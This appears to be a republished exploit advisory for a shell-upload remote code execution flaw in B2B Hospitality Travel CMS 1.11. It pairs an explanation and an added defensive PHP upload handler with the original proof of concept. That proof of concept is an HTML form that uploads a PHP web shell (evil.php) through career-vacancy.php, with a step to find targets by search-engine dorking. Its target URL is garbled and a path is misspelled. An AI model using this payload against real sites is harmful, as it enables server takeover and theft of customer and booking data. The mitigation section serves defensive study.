B2B Hospitality Travel CMS 1.11 Shell Upload
The "B2B Hospitality Travel CMS 1.11 Shell Upload" refers to a critical Remote Code Execution (RCE) vulnerability found in version 1.11 of a specific B2B hospitality and travel content management system.

The flaw is an insecure file upload function. An attacker can upload a malicious script (a "web shell") disguised as a legitimate file (e.g., an image or document), because the server does not properly validate the file's type or content.

Once uploaded and accessible via a web browser, this shell grants the attacker full control over the compromised web server. This includes the ability to execute arbitrary commands, access sensitive data (bookings, customer info, financial records), deface the website, or pivot to other systems within the network.

The vulnerability poses a severe risk to data integrity, privacy, and business operations. Immediate patching to a secure version and implementing robust input validation, file type/content checking, and secure storage for uploaded files are crucial mitigations.
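As an added example, not the vendor's or the advisory author's code, the mitigations listed above applied to the `resume` field of a form like career-vacancy.php, written in PHP; the storage directory, size limit and function name are assumptions:

```php
<?php
// Added example, not the vendor's code: a hardened handler for the "resume"
// field of a form like career-vacancy.php. Function and path names are assumed.
// Extension -> expected sniffed MIME type. ".php" is never accepted.
// Note: older libmagic builds report .docx as "application/zip".
const ALLOWED_TYPES = [
    'pdf'  => 'application/pdf',
    'docx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
];

// Assumed storage directory outside the web root: even if a check were
// bypassed, nothing in here is reachable as /upload/<name>.php.
const RESUME_DIR = '/var/app-data/resumes';

// Validate one $_FILES entry and store it under a server-chosen name.
// Returns the stored filename; throws with a reason the caller can log.
function store_resume(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed, code ' . $file['error']);
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > 5 * 1024 * 1024) {
        throw new RuntimeException('file too large');
    }

    // 1. Extension allow-list. The client-supplied name is used only to pick
    //    the stored extension and is never trusted on its own.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException("extension '$ext' not allowed");
    }

    // 2. Content check: the server-side sniffed type must match the
    //    extension, so a PHP script renamed to resume.pdf is rejected.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException("content type '$mime' does not match .$ext");
    }

    // 3. Random server-chosen name: no part of the original name reaches
    //    disk, and the final path cannot be predicted or controlled.
    $stored = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], RESUME_DIR . '/' . $stored)) {
        throw new RuntimeException('could not store file');
    }
    return $stored;
}
```

Call `store_resume($_FILES['resume'])` inside the form handler and return HTTP 400 on any `RuntimeException`; serving the stored directory through a download script rather than directly is what keeps a missed file from ever executing.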

=============================================================================================================================================
| # Title : B2B Hospitality Travel CMS 1.11 Remote File Upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 137.0.1 (64 bits) |
| # Vendor : https://www.b2bhospitalityindia.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] The following HTML code uploads an executable malicious file remotely.

[+] Save code As : poc.html

[+] Line 09: set your target

[+] Link to the uploaded files :/uopload/evil.php

[+] use payload :

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Career Vacancy Form</title>
</head>
<body>

<form name="enqForm" action="https://www/127.0.0.1/.b2bhospitalityindia.com/career-vacancy.php" method="POST" enctype="multipart/form-data">

<label for="job">Job:</label><br>
<input type="text" id="job" name="job" required><br><br>

<label for="name">Name:</label><br>
<input type="text" id="name" name="name" required><br><br>

<label for="additional_information">Additional Information:</label><br>
<textarea id="additional_information" name="additional_information" rows="5" cols="30"></textarea><br><br>

<label for="email">Email:</label><br>
<input type="email" id="email" name="email" required><br><br>

<label for="mobile">Mobile:</label><br>
<input type="text" id="mobile" name="mobile" required><br><br>

<label for="resume">Resume:</label><br>
<input type="file" id="resume" name="resume" accept=".pdf,.php,.docx" required><br><br>

<input type="submit" name="submit" value="Submit">

</form>

</body>
</html>


=============================================================================================================================================
Greetings to : jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)
=============================================================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸